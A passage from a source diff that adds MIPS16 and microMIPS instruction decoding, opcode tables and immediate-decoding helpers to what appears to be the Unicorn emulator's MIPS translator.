0x1f)); + + /* The extended opcodes cleverly reuse the opcodes from their 16-bit + counterparts. */ + switch (op) { + case M16_OPC_ADDIUSP: + gen_arith_imm(ctx, OPC_ADDIU, rx, 29, imm); + break; + case M16_OPC_ADDIUPC: + gen_addiupc(ctx, rx, imm, 0, 1); + break; + case M16_OPC_B: + gen_compute_branch(ctx, OPC_BEQ, 4, 0, 0, (uint32_t)offset << 1, 0); + /* No delay slot, so just process as a normal instruction */ + break; + case M16_OPC_BEQZ: + gen_compute_branch(ctx, OPC_BEQ, 4, rx, 0, (uint16_t)offset << 1, 0); + /* No delay slot, so just process as a normal instruction */ + break; + case M16_OPC_BNEQZ: + gen_compute_branch(ctx, OPC_BNE, 4, rx, 0, (uint16_t)offset << 1, 0); + /* No delay slot, so just process as a normal instruction */ + break; + case M16_OPC_SHIFT: + switch (ctx->opcode & 0x3) { + case 0x0: + gen_shift_imm(ctx, OPC_SLL, rx, ry, sa); + break; + case 0x1: +#if defined(TARGET_MIPS64) + check_mips_64(ctx); + gen_shift_imm(ctx, OPC_DSLL, rx, ry, sa); +#else + generate_exception(ctx, EXCP_RI); +#endif + break; + case 0x2: + gen_shift_imm(ctx, OPC_SRL, rx, ry, sa); + break; + case 0x3: + gen_shift_imm(ctx, OPC_SRA, rx, ry, sa); + break; + } + break; +#if defined(TARGET_MIPS64) + case M16_OPC_LD: + check_mips_64(ctx); + gen_ld(ctx, OPC_LD, ry, rx, offset); + break; +#endif + case M16_OPC_RRIA: + imm = ctx->opcode & 0xf; + imm = imm | ((ctx->opcode >> 20) & 0x7f) << 4; + imm = imm | ((ctx->opcode >> 16) & 0xf) << 11; + imm = (int16_t) (imm << 1) >> 1; + if ((ctx->opcode >> 4) & 0x1) { +#if defined(TARGET_MIPS64) + check_mips_64(ctx); + gen_arith_imm(ctx, OPC_DADDIU, ry, rx, imm); +#else + generate_exception(ctx, EXCP_RI); +#endif + } else { + gen_arith_imm(ctx, OPC_ADDIU, ry, rx, imm); + } + break; + case M16_OPC_ADDIU8: + gen_arith_imm(ctx, OPC_ADDIU, rx, rx, imm); + break; + case M16_OPC_SLTI: + gen_slt_imm(ctx, OPC_SLTI, 24, rx, imm); + break; + case M16_OPC_SLTIU: + gen_slt_imm(ctx, OPC_SLTIU, 24, rx, imm); + break; + case M16_OPC_I8: + switch (funct) { + case I8_BTEQZ: + gen_compute_branch(ctx, OPC_BEQ, 4, 24, 0, (uint16_t)offset << 1, 0); + break; + case I8_BTNEZ: + gen_compute_branch(ctx, OPC_BNE, 4, 24, 0, (uint16_t)offset << 1, 0); + break; + case I8_SWRASP: + gen_st(ctx, OPC_SW, 31, 29, imm); + break; + case I8_ADJSP: + gen_arith_imm(ctx, OPC_ADDIU, 29, 29, imm); + break; + case I8_SVRS: + { + int xsregs = (ctx->opcode >> 24) & 0x7; + int aregs = (ctx->opcode >> 16) & 0xf; + int do_ra = (ctx->opcode >> 6) & 0x1; + int do_s0 = (ctx->opcode >> 5) & 0x1; + int do_s1 = (ctx->opcode >> 4) & 0x1; + int framesize = (((ctx->opcode >> 20) & 0xf) << 4 + | (ctx->opcode & 0xf)) << 3; + + if (ctx->opcode & (1 << 7)) { + gen_mips16_save(ctx, xsregs, aregs, + do_ra, do_s0, do_s1, + framesize); + } else { + gen_mips16_restore(ctx, xsregs, aregs, + do_ra, do_s0, do_s1, + framesize); + } + } + break; + default: + generate_exception(ctx, EXCP_RI); + break; + } + break; + case M16_OPC_LI: + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rx], (uint16_t) imm); + break; + case M16_OPC_CMPI: + tcg_gen_xori_tl(tcg_ctx, *cpu_gpr[24], *cpu_gpr[rx], (uint16_t) imm); + break; +#if defined(TARGET_MIPS64) + case M16_OPC_SD: + gen_st(ctx, OPC_SD, ry, rx, offset); + break; +#endif + case M16_OPC_LB: + gen_ld(ctx, OPC_LB, ry, rx, offset); + break; + case M16_OPC_LH: + gen_ld(ctx, OPC_LH, ry, rx, offset); + break; + case M16_OPC_LWSP: + gen_ld(ctx, OPC_LW, rx, 29, offset); + break; + case M16_OPC_LW: + gen_ld(ctx, OPC_LW, ry, rx, offset); + break; + case M16_OPC_LBU: + gen_ld(ctx, OPC_LBU, ry, rx, offset); + break; + case M16_OPC_LHU: + gen_ld(ctx, OPC_LHU, ry, rx, offset); + break; + case M16_OPC_LWPC: + gen_ld(ctx, OPC_LWPC, rx, 0, offset); + break; +#if defined(TARGET_MIPS64) + case M16_OPC_LWU: + gen_ld(ctx, OPC_LWU, ry, rx, offset); + break; +#endif + case M16_OPC_SB: + gen_st(ctx, OPC_SB, ry, rx, offset); + break; + case M16_OPC_SH: + gen_st(ctx, OPC_SH, ry, rx, offset); + break; + case M16_OPC_SWSP: + gen_st(ctx, OPC_SW, rx, 29, offset); + break; + case M16_OPC_SW: + gen_st(ctx, OPC_SW, ry, rx, offset); + break; +#if defined(TARGET_MIPS64) + case M16_OPC_I64: + decode_i64_mips16(ctx, ry, funct, offset, 1); + break; +#endif + default: + generate_exception(ctx, EXCP_RI); + break; + } + + return 4; +} + +static int decode_mips16_opc (CPUMIPSState *env, DisasContext *ctx, bool *insn_need_patch) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + int rx, ry; + int sa; + int op, cnvt_op, op1, offset; + int funct; + int n_bytes; + + op = (ctx->opcode >> 11) & 0x1f; + sa = (ctx->opcode >> 2) & 0x7; + sa = sa == 0 ? 8 : sa; + rx = xlat((ctx->opcode >> 8) & 0x7); + cnvt_op = (ctx->opcode >> 5) & 0x7; + ry = xlat((ctx->opcode >> 5) & 0x7); + op1 = offset = ctx->opcode & 0x1f; + + n_bytes = 2; + + // Unicorn: trace this instruction on request + if (HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_CODE, ctx->pc)) { + gen_uc_tracecode(tcg_ctx, 0xf8f8f8f8, UC_HOOK_CODE_IDX, env->uc, ctx->pc); + *insn_need_patch = true; + // the callback might want to stop emulation immediately + check_exit_request(tcg_ctx); + } + + switch (op) { + case M16_OPC_ADDIUSP: + { + int16_t imm = ((uint8_t) ctx->opcode) << 2; + + gen_arith_imm(ctx, OPC_ADDIU, rx, 29, imm); + } + break; + case M16_OPC_ADDIUPC: + gen_addiupc(ctx, rx, ((uint8_t) ctx->opcode) << 2, 0, 0); + break; + case M16_OPC_B: + offset = (ctx->opcode & 0x7ff) << 1; + offset = (int16_t)(offset << 4) >> 4; + gen_compute_branch(ctx, OPC_BEQ, 2, 0, 0, offset, 0); + /* No delay slot, so just process as a normal instruction */ + break; + case M16_OPC_JAL: + offset = cpu_lduw_code(env, ctx->pc + 2); + offset = (((ctx->opcode & 0x1f) << 21) + | ((ctx->opcode >> 5) & 0x1f) << 16 + | offset) << 2; + op = ((ctx->opcode >> 10) & 0x1) ? OPC_JALX : OPC_JAL; + gen_compute_branch(ctx, op, 4, rx, ry, offset, 2); + n_bytes = 4; + break; + case M16_OPC_BEQZ: + gen_compute_branch(ctx, OPC_BEQ, 2, rx, 0, + ((uint8_t)ctx->opcode) << 1, 0); + /* No delay slot, so just process as a normal instruction */ + break; + case M16_OPC_BNEQZ: + gen_compute_branch(ctx, OPC_BNE, 2, rx, 0, + ((uint8_t)ctx->opcode) << 1, 0); + /* No delay slot, so just process as a normal instruction */ + break; + case M16_OPC_SHIFT: + switch (ctx->opcode & 0x3) { + case 0x0: + gen_shift_imm(ctx, OPC_SLL, rx, ry, sa); + break; + case 0x1: +#if defined(TARGET_MIPS64) + check_mips_64(ctx); + gen_shift_imm(ctx, OPC_DSLL, rx, ry, sa); +#else + generate_exception(ctx, EXCP_RI); +#endif + break; + case 0x2: + gen_shift_imm(ctx, OPC_SRL, rx, ry, sa); + break; + case 0x3: + gen_shift_imm(ctx, OPC_SRA, rx, ry, sa); + break; + } + break; +#if defined(TARGET_MIPS64) + case M16_OPC_LD: + check_mips_64(ctx); + gen_ld(ctx, OPC_LD, ry, rx, offset << 3); + break; +#endif + case M16_OPC_RRIA: + { + int16_t imm = (int8_t)((ctx->opcode & 0xf) << 4) >> 4; + + if ((ctx->opcode >> 4) & 1) { +#if defined(TARGET_MIPS64) + check_mips_64(ctx); + gen_arith_imm(ctx, OPC_DADDIU, ry, rx, imm); +#else + generate_exception(ctx, EXCP_RI); +#endif + } else { + gen_arith_imm(ctx, OPC_ADDIU, ry, rx, imm); + } + } + break; + case M16_OPC_ADDIU8: + { + int16_t imm = (int8_t) ctx->opcode; + + gen_arith_imm(ctx, OPC_ADDIU, rx, rx, imm); + } + break; + case M16_OPC_SLTI: + { + int16_t imm = (uint8_t) ctx->opcode; + gen_slt_imm(ctx, OPC_SLTI, 24, rx, imm); + } + break; + case M16_OPC_SLTIU: + { + int16_t imm = (uint8_t) ctx->opcode; + gen_slt_imm(ctx, OPC_SLTIU, 24, rx, imm); + } + break; + case M16_OPC_I8: + { + int reg32; + + funct = (ctx->opcode >> 8) & 0x7; + switch (funct) { + case I8_BTEQZ: + gen_compute_branch(ctx, OPC_BEQ, 2, 24, 0, + ((uint8_t)ctx->opcode) << 1, 0); + break; + case I8_BTNEZ: + gen_compute_branch(ctx, OPC_BNE, 2, 24, 0, + ((uint8_t)ctx->opcode) << 1, 0); + break; + case I8_SWRASP: + gen_st(ctx, OPC_SW, 31, 29, (ctx->opcode & 0xff) << 2); + break; + case I8_ADJSP: + gen_arith_imm(ctx, OPC_ADDIU, 29, 29, + ((uint8_t)ctx->opcode) << 3); + break; + case I8_SVRS: + { + int do_ra = ctx->opcode & (1 << 6); + int do_s0 = ctx->opcode & (1 << 5); + int do_s1 = ctx->opcode & (1 << 4); + int framesize = ctx->opcode & 0xf; + + if (framesize == 0) { + framesize = 128; + } else { + framesize = framesize << 3; + } + + if (ctx->opcode & (1 << 7)) { + gen_mips16_save(ctx, 0, 0, + do_ra, do_s0, do_s1, framesize); + } else { + gen_mips16_restore(ctx, 0, 0, + do_ra, do_s0, do_s1, framesize); + } + } + break; + case I8_MOV32R: + { + int rz = xlat(ctx->opcode & 0x7); + + reg32 = (((ctx->opcode >> 3) & 0x3) << 3) | + ((ctx->opcode >> 5) & 0x7); + gen_arith(ctx, OPC_ADDU, reg32, rz, 0); + } + break; + case I8_MOVR32: + reg32 = ctx->opcode & 0x1f; + gen_arith(ctx, OPC_ADDU, ry, reg32, 0); + break; + default: + generate_exception(ctx, EXCP_RI); + break; + } + } + break; + case M16_OPC_LI: + { + int16_t imm = (uint8_t) ctx->opcode; + + gen_arith_imm(ctx, OPC_ADDIU, rx, 0, imm); + } + break; + case M16_OPC_CMPI: + { + int16_t imm = (uint8_t) ctx->opcode; + gen_logic_imm(ctx, OPC_XORI, 24, rx, imm); + } + break; +#if defined(TARGET_MIPS64) + case M16_OPC_SD: + check_mips_64(ctx); + gen_st(ctx, OPC_SD, ry, rx, offset << 3); + break; +#endif + case M16_OPC_LB: + gen_ld(ctx, OPC_LB, ry, rx, offset); + break; + case M16_OPC_LH: + gen_ld(ctx, OPC_LH, ry, rx, offset << 1); + break; + case M16_OPC_LWSP: + gen_ld(ctx, OPC_LW, rx, 29, ((uint8_t)ctx->opcode) << 2); + break; + case M16_OPC_LW: + gen_ld(ctx, OPC_LW, ry, rx, offset << 2); + break; + case M16_OPC_LBU: + gen_ld(ctx, OPC_LBU, ry, rx, offset); + break; + case M16_OPC_LHU: + gen_ld(ctx, OPC_LHU, ry, rx, offset << 1); + break; + case M16_OPC_LWPC: + gen_ld(ctx, OPC_LWPC, rx, 0, ((uint8_t)ctx->opcode) << 2); + break; +#if defined (TARGET_MIPS64) + case M16_OPC_LWU: + check_mips_64(ctx); + gen_ld(ctx, OPC_LWU, ry, rx, offset << 2); + break; +#endif + case M16_OPC_SB: + gen_st(ctx, OPC_SB, ry, rx, offset); + break; + case M16_OPC_SH: + gen_st(ctx, OPC_SH, ry, rx, offset << 1); + break; + case M16_OPC_SWSP: + gen_st(ctx, OPC_SW, rx, 29, ((uint8_t)ctx->opcode) << 2); + break; + case M16_OPC_SW: + gen_st(ctx, OPC_SW, ry, rx, offset << 2); + break; + case M16_OPC_RRR: + { + int rz = xlat((ctx->opcode >> 2) & 0x7); + int mips32_op; + + switch (ctx->opcode & 0x3) { + case RRR_ADDU: + mips32_op = OPC_ADDU; + break; + case RRR_SUBU: + mips32_op = OPC_SUBU; + break; +#if defined(TARGET_MIPS64) + case RRR_DADDU: + mips32_op = OPC_DADDU; + check_mips_64(ctx); + break; + case RRR_DSUBU: + mips32_op = OPC_DSUBU; + check_mips_64(ctx); + break; +#endif + default: + generate_exception(ctx, EXCP_RI); + goto done; + } + + gen_arith(ctx, mips32_op, rz, rx, ry); + done: + ; + } + break; + case M16_OPC_RR: + switch (op1) { + case RR_JR: + { + int nd = (ctx->opcode >> 7) & 0x1; + int link = (ctx->opcode >> 6) & 0x1; + int ra = (ctx->opcode >> 5) & 0x1; + + if (link) { + op = OPC_JALR; + } else { + op = OPC_JR; + } + + gen_compute_branch(ctx, op, 2, ra ? 31 : rx, 31, 0, + (nd ? 0 : 2)); + } + break; + case RR_SDBBP: + /* XXX: not clear which exception should be raised + * when in debug mode... + */ + check_insn(ctx, ISA_MIPS32); + if (!(ctx->hflags & MIPS_HFLAG_DM)) { + generate_exception(ctx, EXCP_DBp); + } else { + generate_exception(ctx, EXCP_DBp); + } + break; + case RR_SLT: + gen_slt(ctx, OPC_SLT, 24, rx, ry); + break; + case RR_SLTU: + gen_slt(ctx, OPC_SLTU, 24, rx, ry); + break; + case RR_BREAK: + generate_exception(ctx, EXCP_BREAK); + break; + case RR_SLLV: + gen_shift(ctx, OPC_SLLV, ry, rx, ry); + break; + case RR_SRLV: + gen_shift(ctx, OPC_SRLV, ry, rx, ry); + break; + case RR_SRAV: + gen_shift(ctx, OPC_SRAV, ry, rx, ry); + break; +#if defined (TARGET_MIPS64) + case RR_DSRL: + check_mips_64(ctx); + gen_shift_imm(ctx, OPC_DSRL, ry, ry, sa); + break; +#endif + case RR_CMP: + gen_logic(ctx, OPC_XOR, 24, rx, ry); + break; + case RR_NEG: + gen_arith(ctx, OPC_SUBU, rx, 0, ry); + break; + case RR_AND: + gen_logic(ctx, OPC_AND, rx, rx, ry); + break; + case RR_OR: + gen_logic(ctx, OPC_OR, rx, rx, ry); + break; + case RR_XOR: + gen_logic(ctx, OPC_XOR, rx, rx, ry); + break; + case RR_NOT: + gen_logic(ctx, OPC_NOR, rx, ry, 0); + break; + case RR_MFHI: + gen_HILO(ctx, OPC_MFHI, 0, rx); + break; + case RR_CNVT: + switch (cnvt_op) { + case RR_RY_CNVT_ZEB: + tcg_gen_ext8u_tl(tcg_ctx, *cpu_gpr[rx], *cpu_gpr[rx]); + break; + case RR_RY_CNVT_ZEH: + tcg_gen_ext16u_tl(tcg_ctx, *cpu_gpr[rx], *cpu_gpr[rx]); + break; + case RR_RY_CNVT_SEB: + tcg_gen_ext8s_tl(tcg_ctx, *cpu_gpr[rx], *cpu_gpr[rx]); + break; + case RR_RY_CNVT_SEH: + tcg_gen_ext16s_tl(tcg_ctx, *cpu_gpr[rx], *cpu_gpr[rx]); + break; +#if defined (TARGET_MIPS64) + case RR_RY_CNVT_ZEW: + check_mips_64(ctx); + tcg_gen_ext32u_tl(tcg_ctx, *cpu_gpr[rx], *cpu_gpr[rx]); + break; + case RR_RY_CNVT_SEW: + check_mips_64(ctx); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rx], *cpu_gpr[rx]); + break; +#endif + default: + generate_exception(ctx, EXCP_RI); + break; + } + break; + case RR_MFLO: + gen_HILO(ctx, OPC_MFLO, 0, rx); + break; +#if defined (TARGET_MIPS64) + case RR_DSRA: + check_mips_64(ctx); + gen_shift_imm(ctx, OPC_DSRA, ry, ry, sa); + break; + case RR_DSLLV: + check_mips_64(ctx); + gen_shift(ctx, OPC_DSLLV, ry, rx, ry); + break; + case RR_DSRLV: + check_mips_64(ctx); + gen_shift(ctx, OPC_DSRLV, ry, rx, ry); + break; + case RR_DSRAV: + check_mips_64(ctx); + gen_shift(ctx, OPC_DSRAV, ry, rx, ry); + break; +#endif + case RR_MULT: + gen_muldiv(ctx, OPC_MULT, 0, rx, ry); + break; + case RR_MULTU: + gen_muldiv(ctx, OPC_MULTU, 0, rx, ry); + break; + case RR_DIV: + gen_muldiv(ctx, OPC_DIV, 0, rx, ry); + break; + case RR_DIVU: + gen_muldiv(ctx, OPC_DIVU, 0, rx, ry); + break; +#if defined (TARGET_MIPS64) + case RR_DMULT: + check_mips_64(ctx); + gen_muldiv(ctx, OPC_DMULT, 0, rx, ry); + break; + case RR_DMULTU: + check_mips_64(ctx); + gen_muldiv(ctx, OPC_DMULTU, 0, rx, ry); + break; + case RR_DDIV: + check_mips_64(ctx); + gen_muldiv(ctx, OPC_DDIV, 0, rx, ry); + break; + case RR_DDIVU: + check_mips_64(ctx); + gen_muldiv(ctx, OPC_DDIVU, 0, rx, ry); + break; +#endif + default: + generate_exception(ctx, EXCP_RI); + break; + } + break; + case M16_OPC_EXTEND: + decode_extended_mips16_opc(env, ctx); + n_bytes = 4; + break; +#if defined(TARGET_MIPS64) + case M16_OPC_I64: + funct = (ctx->opcode >> 8) & 0x7; + decode_i64_mips16(ctx, ry, funct, offset, 0); + break; +#endif + default: + generate_exception(ctx, EXCP_RI); + break; + } + + return n_bytes; +} + +/* microMIPS extension to MIPS32/MIPS64 */ + +/* + * microMIPS32/microMIPS64 major opcodes + * + * 1. MIPS Architecture for Programmers Volume II-B: + * The microMIPS32 Instruction Set (Revision 3.05) + * + * Table 6.2 microMIPS32 Encoding of Major Opcode Field + * + * 2. MIPS Architecture For Programmers Volume II-A: + * The MIPS64 Instruction Set (Revision 3.51) + */ + +enum { + POOL32A = 0x00, + POOL16A = 0x01, + LBU16 = 0x02, + MOVE16 = 0x03, + ADDI32 = 0x04, + LBU32 = 0x05, + SB32 = 0x06, + LB32 = 0x07, + + POOL32B = 0x08, + POOL16B = 0x09, + LHU16 = 0x0a, + ANDI16 = 0x0b, + ADDIU32 = 0x0c, + LHU32 = 0x0d, + SH32 = 0x0e, + LH32 = 0x0f, + + POOL32I = 0x10, + POOL16C = 0x11, + LWSP16 = 0x12, + POOL16D = 0x13, + ORI32 = 0x14, + POOL32F = 0x15, + POOL32S = 0x16, /* MIPS64 */ + DADDIU32 = 0x17, /* MIPS64 */ + + /* 0x1f is reserved */ + POOL32C = 0x18, + LWGP16 = 0x19, + LW16 = 0x1a, + POOL16E = 0x1b, + XORI32 = 0x1c, + JALS32 = 0x1d, + ADDIUPC = 0x1e, + + /* 0x20 is reserved */ + RES_20 = 0x20, + POOL16F = 0x21, + SB16 = 0x22, + BEQZ16 = 0x23, + SLTI32 = 0x24, + BEQ32 = 0x25, + SWC132 = 0x26, + LWC132 = 0x27, + + /* 0x28 and 0x29 are reserved */ + RES_28 = 0x28, + RES_29 = 0x29, + SH16 = 0x2a, + BNEZ16 = 0x2b, + SLTIU32 = 0x2c, + BNE32 = 0x2d, + SDC132 = 0x2e, + LDC132 = 0x2f, + + /* 0x30 and 0x31 are reserved */ + RES_30 = 0x30, + RES_31 = 0x31, + SWSP16 = 0x32, + B16 = 0x33, + ANDI32 = 0x34, + J32 = 0x35, + SD32 = 0x36, /* MIPS64 */ + LD32 = 0x37, /* MIPS64 */ + + /* 0x38 and 0x39 are reserved */ + RES_38 = 0x38, + RES_39 = 0x39, + SW16 = 0x3a, + LI16 = 0x3b, + JALX32 = 0x3c, + JAL32 = 0x3d, + SW32 = 0x3e, + LW32 = 0x3f +}; + +/* POOL32A encoding of minor opcode field */ + +enum { + /* These opcodes are distinguished only by bits 9..6; those bits are + * what are recorded below. */ + SLL32 = 0x0, + SRL32 = 0x1, + SRA = 0x2, + ROTR = 0x3, + + SLLV = 0x0, + SRLV = 0x1, + SRAV = 0x2, + ROTRV = 0x3, + ADD = 0x4, + ADDU32 = 0x5, + SUB = 0x6, + SUBU32 = 0x7, + MUL = 0x8, + AND = 0x9, + OR32 = 0xa, + NOR = 0xb, + XOR32 = 0xc, + SLT = 0xd, + SLTU = 0xe, + + MOVN = 0x0, + MOVZ = 0x1, + LWXS = 0x4, + + /* The following can be distinguished by their lower 6 bits. */ + INS = 0x0c, + EXT = 0x2c, + POOL32AXF = 0x3c +}; + +/* POOL32AXF encoding of minor opcode field extension */ + +/* + * 1. MIPS Architecture for Programmers Volume II-B: + * The microMIPS32 Instruction Set (Revision 3.05) + * + * Table 6.5 POOL32Axf Encoding of Minor Opcode Extension Field + * + * 2. MIPS Architecture for Programmers VolumeIV-e: + * The MIPS DSP Application-Specific Extension + * to the microMIPS32 Architecture (Revision 2.34) + * + * Table 5.5 POOL32Axf Encoding of Minor Opcode Extension Field + */ + +enum { + /* bits 11..6 */ + TEQ = 0x00, + TGE = 0x08, + TGEU = 0x10, + TLT = 0x20, + TLTU = 0x28, + TNE = 0x30, + + MFC0 = 0x03, + MTC0 = 0x0b, + + /* begin of microMIPS32 DSP */ + + /* bits 13..12 for 0x01 */ + MFHI_ACC = 0x0, + MFLO_ACC = 0x1, + MTHI_ACC = 0x2, + MTLO_ACC = 0x3, + + /* bits 13..12 for 0x2a */ + MADD_ACC = 0x0, + MADDU_ACC = 0x1, + MSUB_ACC = 0x2, + MSUBU_ACC = 0x3, + + /* bits 13..12 for 0x32 */ + MULT_ACC = 0x0, + MULTU_ACC = 0x1, + + /* end of microMIPS32 DSP */ + + /* bits 15..12 for 0x2c */ + SEB = 0x2, + SEH = 0x3, + CLO = 0x4, + CLZ = 0x5, + RDHWR = 0x6, + WSBH = 0x7, + MULT = 0x8, + MULTU = 0x9, + DIV = 0xa, + DIVU = 0xb, + MADD = 0xc, + MADDU = 0xd, + MSUB = 0xe, + MSUBU = 0xf, + + /* bits 15..12 for 0x34 */ + MFC2 = 0x4, + MTC2 = 0x5, + MFHC2 = 0x8, + MTHC2 = 0x9, + CFC2 = 0xc, + CTC2 = 0xd, + + /* bits 15..12 for 0x3c */ + JALR = 0x0, + JR = 0x0, /* alias */ + JALR_HB = 0x1, + JALRS = 0x4, + JALRS_HB = 0x5, + + /* bits 15..12 for 0x05 */ + RDPGPR = 0xe, + WRPGPR = 0xf, + + /* bits 15..12 for 0x0d */ + TLBP = 0x0, + TLBR = 0x1, + TLBWI = 0x2, + TLBWR = 0x3, + WAIT = 0x9, + IRET = 0xd, + DERET = 0xe, + ERET = 0xf, + + /* bits 15..12 for 0x15 */ + DMT = 0x0, + DVPE = 0x1, + EMT = 0x2, + EVPE = 0x3, + + /* bits 15..12 for 0x1d */ + DI = 0x4, + EI = 0x5, + + /* bits 15..12 for 0x2d */ + SYNC = 0x6, + SYSCALL = 0x8, + SDBBP = 0xd, + + /* bits 15..12 for 0x35 */ + MFHI32 = 0x0, + MFLO32 = 0x1, + MTHI32 = 0x2, + MTLO32 = 0x3, +}; + +/* POOL32B encoding of minor opcode field (bits 15..12) */ + +enum { + LWC2 = 0x0, + LWP = 0x1, + LDP = 0x4, + LWM32 = 0x5, + CACHE = 0x6, + LDM = 0x7, + SWC2 = 0x8, + SWP = 0x9, + SDP = 0xc, + SWM32 = 0xd, + SDM = 0xf +}; + +/* POOL32C encoding of minor opcode field (bits 15..12) */ + +enum { + LWL = 0x0, + SWL = 0x8, + LWR = 0x1, + SWR = 0x9, + PREF = 0x2, + /* 0xa is reserved */ + LL = 0x3, + SC = 0xb, + LDL = 0x4, + SDL = 0xc, + LDR = 0x5, + SDR = 0xd, + /* 0x6 is reserved */ + LWU = 0xe, + LLD = 0x7, + SCD = 0xf +}; + +/* POOL32F encoding of minor opcode field (bits 5..0) */ + +enum { + /* These are the bit 7..6 values */ + ADD_FMT = 0x0, + MOVN_FMT = 0x0, + + SUB_FMT = 0x1, + MOVZ_FMT = 0x1, + + MUL_FMT = 0x2, + + DIV_FMT = 0x3, + + /* These are the bit 8..6 values */ + RSQRT2_FMT = 0x0, + MOVF_FMT = 0x0, + + LWXC1 = 0x1, + MOVT_FMT = 0x1, + + PLL_PS = 0x2, + SWXC1 = 0x2, + + PLU_PS = 0x3, + LDXC1 = 0x3, + + PUL_PS = 0x4, + SDXC1 = 0x4, + RECIP2_FMT = 0x4, + + PUU_PS = 0x5, + LUXC1 = 0x5, + + CVT_PS_S = 0x6, + SUXC1 = 0x6, + ADDR_PS = 0x6, + PREFX = 0x6, + + MULR_PS = 0x7, + + MADD_S = 0x01, + MADD_D = 0x09, + MADD_PS = 0x11, + ALNV_PS = 0x19, + MSUB_S = 0x21, + MSUB_D = 0x29, + MSUB_PS = 0x31, + + NMADD_S = 0x02, + NMADD_D = 0x0a, + NMADD_PS = 0x12, + NMSUB_S = 0x22, + NMSUB_D = 0x2a, + NMSUB_PS = 0x32, + + POOL32FXF = 0x3b, + + CABS_COND_FMT = 0x1c, /* MIPS3D */ + C_COND_FMT = 0x3c +}; + +/* POOL32Fxf encoding of minor opcode extension field */ + +enum { + CVT_L = 0x04, + RSQRT_FMT = 0x08, + FLOOR_L = 0x0c, + CVT_PW_PS = 0x1c, + CVT_W = 0x24, + SQRT_FMT = 0x28, + FLOOR_W = 0x2c, + CVT_PS_PW = 0x3c, + CFC1 = 0x40, + RECIP_FMT = 0x48, + CEIL_L = 0x4c, + CTC1 = 0x60, + CEIL_W = 0x6c, + MFC1 = 0x80, + CVT_S_PL = 0x84, + TRUNC_L = 0x8c, + MTC1 = 0xa0, + CVT_S_PU = 0xa4, + TRUNC_W = 0xac, + MFHC1 = 0xc0, + ROUND_L = 0xcc, + MTHC1 = 0xe0, + ROUND_W = 0xec, + + MOV_FMT = 0x01, + MOVF = 0x05, + ABS_FMT = 0x0d, + RSQRT1_FMT = 0x1d, + MOVT = 0x25, + NEG_FMT = 0x2d, + CVT_D = 0x4d, + RECIP1_FMT = 0x5d, + CVT_S = 0x6d +}; + +/* POOL32I encoding of minor opcode field (bits 25..21) */ + +enum { + BLTZ = 0x00, + BLTZAL = 0x01, + BGEZ = 0x02, + BGEZAL = 0x03, + BLEZ = 0x04, + BNEZC = 0x05, + BGTZ = 0x06, + BEQZC = 0x07, + TLTI = 0x08, + TGEI = 0x09, + TLTIU = 0x0a, + TGEIU = 0x0b, + TNEI = 0x0c, + LUI = 0x0d, + TEQI = 0x0e, + SYNCI = 0x10, + BLTZALS = 0x11, + BGEZALS = 0x13, + BC2F = 0x14, + BC2T = 0x15, + BPOSGE64 = 0x1a, + BPOSGE32 = 0x1b, + /* These overlap and are distinguished by bit16 of the instruction */ + BC1F = 0x1c, + BC1T = 0x1d, + BC1ANY2F = 0x1c, + BC1ANY2T = 0x1d, + BC1ANY4F = 0x1e, + BC1ANY4T = 0x1f +}; + +/* POOL16A encoding of minor opcode field */ + +enum { + ADDU16 = 0x0, + SUBU16 = 0x1 +}; + +/* POOL16B encoding of minor opcode field */ + +enum { + SLL16 = 0x0, + SRL16 = 0x1 +}; + +/* POOL16C encoding of minor opcode field */ + +enum { + NOT16 = 0x00, + XOR16 = 0x04, + AND16 = 0x08, + OR16 = 0x0c, + LWM16 = 0x10, + SWM16 = 0x14, + JR16 = 0x18, + JRC16 = 0x1a, + JALR16 = 0x1c, + JALR16S = 0x1e, + MFHI16 = 0x20, + MFLO16 = 0x24, + BREAK16 = 0x28, + SDBBP16 = 0x2c, + JRADDIUSP = 0x30 +}; + +/* POOL16D encoding of minor opcode field */ + +enum { + ADDIUS5 = 0x0, + ADDIUSP = 0x1 +}; + +/* POOL16E encoding of minor opcode field */ + +enum { + ADDIUR2 = 0x0, + ADDIUR1SP = 0x1 +}; + +static int mmreg (int r) +{ + static const int map[] = { 16, 17, 2, 3, 4, 5, 6, 7 }; + + return map[r]; +} + +/* Used for 16-bit store instructions. */ +static int mmreg2 (int r) +{ + static const int map[] = { 0, 17, 2, 3, 4, 5, 6, 7 }; + + return map[r]; +} + +#define uMIPS_RD(op) ((op >> 7) & 0x7) +#define uMIPS_RS(op) ((op >> 4) & 0x7) +#define uMIPS_RS2(op) uMIPS_RS(op) +#define uMIPS_RS1(op) ((op >> 1) & 0x7) +#define uMIPS_RD5(op) ((op >> 5) & 0x1f) +#define uMIPS_RS5(op) (op & 0x1f) + +/* Signed immediate */ +#define SIMM(op, start, width) \ + ((int32_t)(((op >> start) & ((~0U) >> (32-width))) \ + << (32-width)) \ + >> (32-width)) +/* Zero-extended immediate */ +#define ZIMM(op, start, width) ((op >> start) & ((~0U) >> (32-width))) + +static void gen_addiur1sp(DisasContext *ctx) +{ + int rd = mmreg(uMIPS_RD(ctx->opcode)); + + gen_arith_imm(ctx, OPC_ADDIU, rd, 29, ((ctx->opcode >> 1) & 0x3f) << 2); +} + +static void gen_addiur2(DisasContext *ctx) +{ + static const int decoded_imm[] = { 1, 4, 8, 12, 16, 20, 24, -1 }; + int rd = mmreg(uMIPS_RD(ctx->opcode)); + int rs = mmreg(uMIPS_RS(ctx->opcode)); + + gen_arith_imm(ctx, OPC_ADDIU, rd, rs, decoded_imm[ZIMM(ctx->opcode, 1, 3)]); +} + +static void gen_addiusp(DisasContext *ctx) +{ + int encoded = ZIMM(ctx->opcode, 1, 9); + int decoded; + + if (encoded <= 1) { + decoded = 256 + encoded; + } else if (encoded <= 255) { + decoded = encoded; + } else if (encoded <= 509) { + decoded = encoded - 512; + } else { + decoded = encoded - 768; + } + + gen_arith_imm(ctx, OPC_ADDIU, 29, 29, decoded << 2); +} + +static void gen_addius5(DisasContext *ctx) +{ + int imm = SIMM(ctx->opcode, 1, 4); + int rd = (ctx->opcode >> 5) & 0x1f; + + gen_arith_imm(ctx, OPC_ADDIU, rd, rd, imm); +} + +static void gen_andi16(DisasContext *ctx) +{ + static const int decoded_imm[] = { 128, 1, 2, 3, 4, 7, 